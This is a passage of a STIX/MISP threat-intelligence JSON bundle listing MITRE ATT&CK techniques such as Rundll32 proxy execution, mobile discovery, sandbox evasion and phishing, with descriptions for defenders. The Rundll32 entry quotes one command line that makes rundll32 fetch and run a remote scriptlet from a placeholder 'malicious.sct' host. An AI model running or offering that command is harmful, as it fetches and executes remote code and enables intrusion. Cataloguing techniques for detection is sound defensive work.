"misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Scripting - T1064\""], "external_references": [{"source_name": "mitre-attack", "external_id": "T1064"}]}, {"type": "attack-pattern", "id": "attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Rundll32 - T1085", "description": "ATT&CK Tactic | The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\""], "external_references": [{"source_name": "mitre-attack", "external_id": "T1085"}]}, {"type": "attack-pattern", "id": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "File and Directory Discovery - T1420", "description": "ATT&CK Tactic | On Android, command line tools or the Java file APIs can be used to enumerate file system contents. However, Linux file permissions and SELinux policies generally strongly restrict what can be accessed by apps (without taking advantage of a privilege escalation exploit). The contents of the external storage directory are generally visible, which could present concern if sensitive data is inappropriately stored there.\n\niOS's security architecture generally restricts the ability to perform file and directory discovery without use of escalated privileges.", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"File and Directory Discovery - T1420\""], "external_references": [{"source_name": "mitre-attack", "external_id": "T1420"}]}, {"type": "attack-pattern", "id": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Process Discovery - T1424", "description": "ATT&CK Tactic | On Android versions prior to 5, applications can observe information about other processes that are running through methods in the ActivityManager class. On Android versions prior to 7, applications can obtain this information by executing the <code>ps</code> command, or by examining the <code>/proc</code> directory. Starting in Android version 7, use of the Linux kernel's <code>hidepid</code> feature prevents applications (without escalated privileges) from accessing this information (Citation: Android-SELinuxChanges).", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Process Discovery - T1424\""], "external_references": [{"source_name": "mitre-attack", "external_id": "T1424"}]}, {"type": "attack-pattern", "id": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "System Information Discovery - T1426", "description": "ATT&CK Tactic | An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, and architecture.\n\nOn Android, much of this information is programmatically accessible to applications through the android.os.Build class.(Citation: Android-Build)\n\nOn iOS, techniques exist for applications to programmatically access this information.(Citation: StackOverflow-iOSVersion)", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"System Information Discovery - T1426\""], "external_references": [{"source_name": "mitre-attack", "external_id": "T1426"}]}, {"type": "attack-pattern", "id": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Virtualization/Sandbox Evasion - T1497", "description": "ATT&CK Tactic | Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nAdversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)\n\n", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Virtualization/Sandbox Evasion - T1497\""], "external_references": [{"source_name": "mitre-attack", "external_id": "T1497"}]}, {"type": "attack-pattern", "id": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Phishing - T1566", "description": "ATT&CK Tactic | Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source.", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Phishing - T1566\""], "external_references": [{"source_name": "capec", "external_id": "CAPEC-98"}]}]}